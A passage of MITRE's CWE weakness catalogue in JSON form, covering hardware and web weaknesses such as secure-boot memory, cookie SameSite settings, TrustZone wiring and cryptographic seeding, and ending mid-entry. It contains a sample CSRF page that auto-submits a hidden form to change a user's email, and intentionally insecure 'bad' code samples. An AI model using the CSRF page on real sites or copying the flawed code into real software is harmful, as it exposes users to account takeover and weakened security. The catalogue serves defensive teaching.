access to the hidden functionalities protected by those credentials."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Integration","Description":"Ensure the unlock credentials are shared with the minimum number of parties and with utmost secrecy. To limit the risk associated with compromised credentials, where possible, the credentials should be part-specific."},{"Phase":"Manufacturing","Description":"Ensure the unlock credentials are shared with the minimum number of parties and with utmost secrecy. To limit the risk associated with compromised credentials, where possible, the credentials should be part-specific."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example shows how an attacker can take advantage of compromised credentials.","Example_Code":[{"#text":"Suppose a semiconductor chipmaker, \u201cC\u201d, uses the foundry \u201cF\u201d for fabricating its chips. Now, F has many other customers in addition to C, and some of the other customers are much smaller companies. F has dedicated teams for each of its customers, but somehow it mixes up the unlock credentials and sends the unlock credentials of C to the wrong team. This other team does not take adequate precautions to protect the credentials that have nothing to do with them, and eventually the unlock credentials of C get leaked.","attr":{"@_Nature":"bad"}},{"#text":"Vertical integration of a production company is one effective method of protecting sensitive credentials. Where vertical integration is not possible, strict access control and need-to-know are methods which can be implemented to reduce these risks.","attr":{"@_Nature":"good"}}],"Body_Text":"When the credentials of multiple organizations are stored together, exposure to third parties occurs frequently."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"560"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Related_Attack_Patterns"}}},"1274":{"attr":{"@_ID":"1274","@_Name":"Improper Access Control for Volatile Memory Containing Boot Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product conducts a secure-boot process that transfers bootloader code from Non-Volatile Memory (NVM) into Volatile Memory (VM), but it does not have sufficient access control or other protections for the Volatile Memory.","Extended_Description":{"xhtml:p":["Adversaries could bypass the secure-boot process and execute their own untrusted, malicious boot code.","As a part of a secure-boot process, the read-only-memory (ROM) code for a System-on-Chip (SoC) or other system fetches bootloader code from Non-Volatile Memory (NVM) and stores the code in Volatile Memory (VM), such as dynamic, random-access memory (DRAM) or static, random-access memory (SRAM). The NVM is usually external to the SoC, while the VM is internal to the SoC. As the code is transferred from NVM to VM, it is authenticated by the SoC\'s ROM code.","If the volatile-memory-region protections or access controls are insufficient to prevent modifications from an adversary or untrusted agent, the secure boot may be bypassed or replaced with the execution of an adversary\'s code."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"This weakness can be introduced during hardware architecture or design but can be identified later during testing."}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Ensure the volatile memory is lockable or has locks. Ensure the volatile memory is locked for writes from untrusted agents or adversaries. Try modifying the volatile memory from an untrusted agent, and ensure these writes are dropped.","Effectiveness":"High"},{"Method":"Manual Analysis","Description":{"xhtml:p":["Analyze the device using the following steps:","Only trusted masters should be allowed to write to the memory regions. For example, pluggable device peripherals should not have write access to program load memory regions."],"xhtml:ul":{"xhtml:li":["1) Identify all fabric master agents that are active during system Boot Flow when initial code is loaded from Non-volatile storage to volatile memory.","2) Identify the volatile memory regions that are used for storing loaded system executable program.","3) During system boot, test programming the identified memory regions in step 2 from all the masters identified in step 1."]}},"Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that the design of volatile-memory protections is enough to prevent modification from an adversary or untrusted code."},{"Phase":"Testing","Description":"Test the volatile-memory protections to ensure they are safe from modification or untrusted code."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A typical SoC secure boot\'s flow includes fetching the next piece of code (i.e., the boot loader) from NVM (e.g., serial, peripheral interface (SPI) flash), and transferring it to DRAM/SRAM volatile, internal memory, which is more efficient.","Example_Code":[{"#text":"The volatile-memory protections or access controls are insufficient.","attr":{"@_Nature":"bad"}},{"#text":"A good architecture should define appropriate protections or access controls to prevent modification by an adversary or untrusted agent, once the bootloader is authenticated.","attr":{"@_Nature":"good"}}],"Body_Text":"The memory from where the boot loader executes can be modified by an adversary."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-2267","Description":"Locked memory regions may be modified through other interfaces in a secure-boot-loader image due to improper access control.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2267"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Related_Attack_Patterns"},"Contribution":[{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"suggested content improvements"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided detection method"}]}},"1275":{"attr":{"@_ID":"1275","@_Name":"Sensitive Cookie with Improper SameSite Attribute","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The SameSite attribute for sensitive cookies is not set, or an insecure value is used.","Extended_Description":"The SameSite attribute controls how cookies are sent for cross-domain requests. This attribute may have three values: \'Lax\', \'Strict\', or \'None\'. If the \'None\' value is used, a website may create a cross-domain POST HTTP request to another website, and the browser automatically adds cookies to this request. This may lead to Cross-Site-Request-Forgery (CSRF) attacks if there are no additional protections in place (such as Anti-CSRF tokens).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"352","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This weakness occurs during implementation when the coder does not properly set the SameSite attribute."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Non-Repudiation","Access Control"],"Impact":"Modify Application Data","Likelihood":"Low","Note":"If the website does not impose additional defense against CSRF attacks, failing to use the \'Lax\' or \'Strict\' values could increase the risk of exposure to CSRF attacks. The likelihood of the integrity breach is Low because a successful attack does not only depend on an insecure SameSite attribute. In order to perform a CSRF attack there are many conditions that must be met, such as the lack of CSRF tokens, no confirmations for sensitive actions on the website, a \\"simple\\" \\"Content-Type\\" header in the HTTP request and many more."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Set the SameSite attribute of a sensitive cookie to \'Lax\' or \'Strict\'. This instructs the browser to apply this cookie only to same-domain requests, which provides a good Defense in Depth against CSRF attacks. When the \'Lax\' value is in use, cookies are also sent for top-level cross-domain navigation via HTTP GET, HEAD, OPTIONS, and TRACE methods, but not for other HTTP methods that are more like to cause side-effects of state mutation.","Effectiveness":"High","Effectiveness_Notes":"While this mitigation is effective for protecting cookies from a browser\'s own scripting engine, third-party components or plugins may have their own engines that allow access to cookies. Attackers might also be able to use XMLHTTPResponse to read the headers directly and obtain the cookie."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a cookie is used to store a session ID for a client\'s interaction with a website. The snippet of code below establishes a new cookie to hold the sessionID.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:div":{"#text":"let sessionId = generateSessionId()let cookieOptions = { domain: \'example.com\' }response.cookie(\'sessionid\', sessionId, cookieOptions)","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;html&gt;","xhtml:div":{"#text":"&lt;form id=evil action=\\"http://local:3002/setEmail\\" method=\\"POST\\"&gt;&lt;input type=\\"hidden\\" name=\\"newEmail\\" value=\\"abc@example.com\\" /&gt;&lt;/form&gt;&lt;script&gt;evil.submit()&lt;/script&gt;&lt;/html&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},{"attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:div":{"#text":"let sessionId = generateSessionId()let cookieOptions = { domain: \'example.com\', sameSite: \'Strict\' }response.cookie(\'sessionid\', sessionId, cookieOptions","xhtml:br":["",""]}}],"Body_Text":["Since the sameSite attribute is not specified, the cookie will be sent to the website with each request made by the client. An attacker who can potentially perform CSRF attack by using the following malicious page:","When the client visits this malicious web page, it submits a \'/setEmail\' POST HTTP request to the vulnerable website. Since the browser automatically appends the \'sessionid\' cookie to the request, the website automatically performs a \'setEmail\' action on behalf of the client.","To mitigate the risk, use the sameSite attribute of the \'sessionid\' cookie set to \'Strict\'."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"62"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1104"}},{"attr":{"@_External_Reference_ID":"REF-1105"}},{"attr":{"@_External_Reference_ID":"REF-1106"}}]},"Content_History":{"Submission":{"Submission_Name":"Michael Stepankin","Submission_Organization":"Veracode","Submission_Date":"2020-06-19"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"}}},"1276":{"attr":{"@_ID":"1276","@_Name":"Hardware Child Block Incorrectly Connected to Parent System","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Signals between a hardware IP and the parent system design are incorrectly connected causing security risks.","Extended_Description":{"xhtml:p":"Individual hardware IP must communicate with the parent system in order for the product to function correctly and as intended. If implemented incorrectly, while not causing any apparent functional issues, may cause security issues. For example, if the IP should only be reset by a system-wide hard reset, but instead the reset input is connected to a software-triggered debug mode reset (which is also asserted during a hard reset), integrity of data inside the IP can be violated."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This weakness is introduced when integrating IP into a parent design."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"System-level verification may be used to ensure that components are correctly connected and that design security requirements are not violated due to interactions between various IP blocks."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Many SoCs use hardware to partition system resources between trusted and un-trusted entities. One example of this concept is the Arm TrustZone, in which the processor and all security-aware IP attempt to isolate resources based on the status of a privilege bit. This privilege bit is part of the input interface in all TrustZone-aware IP. If this privilege bit is accidentally grounded or left unconnected when the IP is instantiated, privilege escalation of all input data may occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:p":["// IP definition","module tz_peripheral(clk, reset, data_in, data_in_security_level, ...);",{"#text":"input clk, reset;","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input [31:0] data_in;","attr":{"@_style":"text-indent: 15px;"}},{"#text":"input data_in_security_level;","attr":{"@_style":"text-indent: 15px;"}},{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},"endmodule","// Instantiation of IP in a parent system","module soc(...)",{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},{"#text":"tz_peripheral u_tz_peripheral(","attr":{"@_style":"text-indent: 15px;"}},{"#text":".clk(clk),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".rst(rst),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in(rdata),","attr":{"@_style":"text-indent: 30px;"}},{"#text":"//Copy-and-paste error or typo grounds data_in_security_level (in this example 0=secure, 1=non-secure) effectively promoting all data to \u201csecure\u201d)","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in_security_level(1\'b0),","attr":{"@_style":"text-indent: 30px;"}},{"#text":");","attr":{"@_style":"text-indent: 15px;"}},{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},"endmodule"]},{"attr":{"@_Nature":"good","@_Language":"Verilog"},"xhtml:p":["// Instantiation of IP in a parent system","module soc(...)",{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},{"#text":"tz_peripheral u_tz_peripheral(","attr":{"@_style":"text-indent: 15px;"}},{"#text":".clk(clk),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".rst(rst),","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in(rdata),","attr":{"@_style":"text-indent: 30px;"}},{"#text":"// This port is no longer grounded, but instead drive by the appropriate signal","attr":{"@_style":"text-indent: 30px;"}},{"#text":".data_in_security_level(rdata_security_level),","attr":{"@_style":"text-indent: 30px;"}},{"#text":");","attr":{"@_style":"text-indent: 15px;"}},{"#text":"...","attr":{"@_style":"text-indent: 15px;"}},"endmodule"]}],"Body_Text":"In the Verilog code below, the security level input to the TrustZone aware peripheral is correctly driven by an appropriate signal instead of being grounded."}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-22"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations"},"Previous_Entry_Name":{"#text":"Hardware Block Incorrectly Connected to Larger System","attr":{"@_Date":"2020-08-20"}}}},"1277":{"attr":{"@_ID":"1277","@_Name":"Firmware Not Updateable","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not provide its\\n\\t\\t\\tusers with the ability to update or patch its\\n\\t\\t\\tfirmware to address any vulnerabilities or\\n\\t\\t\\tweaknesses that may be present.","Extended_Description":"Without the ability to\\n\\t\\t\\tpatch or update firmware, consumers will be\\n\\t\\t\\tleft vulnerable to exploitation of any known\\n\\t\\t\\tvulnerabilities, or any vulnerabilities that\\n\\t\\t\\tare discovered in the future. This can expose\\n\\t\\t\\tconsumers to permanent risk throughout the\\n\\t\\t\\tentire lifetime of the device, which could be\\n\\t\\t\\tyears or decades. Some external protective\\n\\t\\t\\tmeasures and mitigations might be employed to\\n\\t\\t\\taid in preventing or reducing the risk of\\n\\t\\t\\tmalicious attack, but the root weakness cannot\\n\\t\\t\\tbe corrected.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1329","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Requirements","Note":"Requirements development might not consider the importance of updates over the lifetime of the product, or might not choose the ability due to concerns such as expense or speed to market."},{"Phase":"Architecture and Design","Note":"Lack of planning during architecture development and design, or external pressures such as speed to market, could ignore the capability to update."},{"Phase":"Implementation","Note":"The weakness can appear through oversight during implementation."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authentication","Authorization"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands","DoS: Crash, Exit, or Restart"],"Likelihood":"Medium","Note":"If an attacker can identify an exploitable vulnerability in one device that has no means of patching, the attack may be used against an entire class of devices."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Create a new installable boot image of the current build with a minor version number change. Use the standard installation method to update the boot image. Verify that the minor version number has changed. Create a fake image. Verify that the boot updater will not install the fake image and generates an invalid image error message.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Check the consumer or maintainer documentation, the architecture/design documentation, or the original requirements to ensure that the documentation includes details for how to update the firmware.","Effectiveness":"Moderate"},{"Method":"Manual Dynamic Analysis","Description":"Determine if there is a lack of a capability to update read-only memory structure. This could manifest as a difference between the latest firmware version and current version within the device.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Specify requirements to provide the ability to update the firmware."},{"Phase":"Architecture and Design","Description":"Design the device to allow for updating the firmware."},{"Phase":"Implementation","Description":"Implement the necessary functionality to allow the firmware to be updated."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-145"},"Intro_Text":"A refrigerator has an Internet interface for the official purpose of alerting the manufacturer when that refrigerator detects a fault. Because the device is attached to the Internet, the refrigerator is a target for hackers who may wish to use the device other potentially more nefarious purposes.","Example_Code":[{"#text":"The refrigerator has no means of patching and is hacked becoming a spewer of email spam.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The device automatically patches itself and provides considerable more protection against being hacked.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-9054","Description":"Chain: network-attached storage (NAS) device has a critical OS command injection (CWE-78) vulnerability that is actively exploited to place IoT devices into a botnet, but some products are \\"end-of-support\\" and cannot be patched (CWE-1277). [REF-1097]","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9054"},{"Reference":"REF-1095","Description":"hardware \\"smart lock\\" has weak key generation, allowing attackers to steal the key by BLE sniffing, but the device\'s firmware cannot be upgraded [REF-1095].","Link":"https://www.theregister.com/2019/12/11/f_secure_keywe/"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1095"}},{"attr":{"@_External_Reference_ID":"REF-1096"}},{"attr":{"@_External_Reference_ID":"REF-1097"}}]},"Notes":{"Note":{"#text":"The \\"firmware\\" term does not have a single commonly-shared definition, so there may be variations in how this CWE entry is interpreted during mapping.","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"Paul A. Wortman","Submission_Organization":"Wells Fargo","Submission_Date":"2020-05-13"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Maintenance_Notes"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Paul A. Wortman","Contribution_Organization":"Wells Fargo","Contribution_Date":"2021-10-12","Contribution_Comment":"provided detection methods and observed examples"}}},"1278":{"attr":{"@_ID":"1278","@_Name":"Missing Protection Against Hardware Reverse Engineering Using Integrated Circuit (IC) Imaging Techniques","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Information stored in hardware may be recovered by an attacker with the capability to capture and analyze images of the integrated circuit using techniques such as scanning electron microscopy.","Extended_Description":{"xhtml:p":["The physical structure of a device, viewed at high enough magnification, can reveal the information stored inside. Typical steps in IC reverse engineering involve removing the chip packaging (decapsulation) then using various imaging techniques ranging from high resolution x-ray microscopy to invasive techniques involving removing IC layers and imaging each layer using a scanning electron microscope.","The goal of such activities is to recover secret keys, unique device identifiers, and proprietary code and circuit designs embedded in hardware that the attacker has been unsuccessful at accessing through other means. These secrets may be stored in non-volatile memory or in the circuit netlist. Memory technologies such as masked ROM allow easier to extraction of secrets than One-time Programmable (OTP) memory."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Varies by Context","Note":"A common goal of malicious actors who reverse engineer ICs is to produce and sell counterfeit versions of the IC."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"The cost of secret extraction via IC reverse engineering should outweigh the potential value of the secrets being extracted. Threat model and value of secrets should be used to choose the technology used to safeguard those secrets. Examples include IC camouflaging and obfuscation, tamper-proof packaging, active shielding, and physical tampering detection information erasure."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider an SoC design that embeds a secret key in read-only memory (ROM). The key is baked into the design logic and may not be modified after fabrication causing the key to be identical for all devices.  An attacker in possession of the IC can decapsulate and delayer the device. After imaging the layers, computer vision algorithms or manual inspection of the circuit features locate the ROM and reveal the value of the key bits as encoded in the visible circuit structure of the ROM."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1092"}},{"attr":{"@_External_Reference_ID":"REF-1129"}}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements. It is more attack-oriented, so it might be more suited for CAPEC.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-20"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, References, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"1279":{"attr":{"@_ID":"1279","@_Name":"Cryptographic Operations are run Before Supporting Units are Ready","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Performing cryptographic operations without ensuring that the supporting inputs are ready to supply valid data may compromise the cryptographic result.","Extended_Description":"Many cryptographic hardware units depend upon other hardware units to supply information to them to produce a securely encrypted result. For example, a cryptographic unit that depends on an external random-number-generator (RNG) unit for entropy must wait until the RNG unit is producing random numbers. If a cryptographic unit retrieves a private encryption key from a fuse unit, the fuse unit must be up and running before a key may be supplied.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"The decision to continue using a cryptographic unit even though the input units to it are not producing valid data will compromise the encrypted result."}]},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality","Integrity","Availability","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Best practices should be used to design cryptographic systems."},{"Phase":"Implementation","Description":"Continuously ensuring that cryptographic inputs are supplying valid information is necessary to ensure that the encrypted output is secure."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following pseudocode illustrates the weak encryption resulting from the use of a pseudo-random-number generator output.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["If random_number_generator_self_test_passed() == TRUE","then Seed = get_random_number_from_RNG()","else Seed = hardcoded_number"]},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:p":["If random_number_generator_self_test_passed() == TRUE","then Seed = get_random_number_from_RNG()","else enter_error_state()"]}],"Body_Text":"In the example above, first a check of RNG ready is performed. If the check fails, the RNG is ignored and a hard coded value is used instead. The hard coded value severely weakens the encrypted output."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"97"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Cryptographic Primitives used without Successful Self-Test","attr":{"@_Date":"2020-08-20"}}}},"1280":{"attr":{"@_ID":"1280","@_Name":"Access Control Check Implemented After Asset is Accessed","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product\'s hardware-based access control check occurs after the asset has been accessed.","Extended_Description":{"xhtml:p":"The product implements a hardware-based access control check. The asset should be accessible only after the check is successful. If, however, this operation is not atomic and the asset is accessed before the check is complete, the security of the system may be compromised."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory","Modify Application Data","Read Application Data","Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Implement the access control check first. Access should only be given to asset if agent is authorized."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Assume that the module foo_bar implements a protected register. The register content is the asset. Only transactions made by user id (indicated by signal usr_id) 0x4 are allowed to modify the register contents. The signal grant_access is used to provide access.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:div":{"#text":"module foo_bar(data_out, usr_id, data_in, clk, rst_n);endmodule","xhtml:p":["output reg [7:0] data_out;;","input wire [2:0] usr_id;","input wire [7:0] data_in;","input wire clk, rst_n;","wire grant_access;","always @ (posedge clk or negedge rst_n)","begin"],"xhtml:div":{"#text":"if 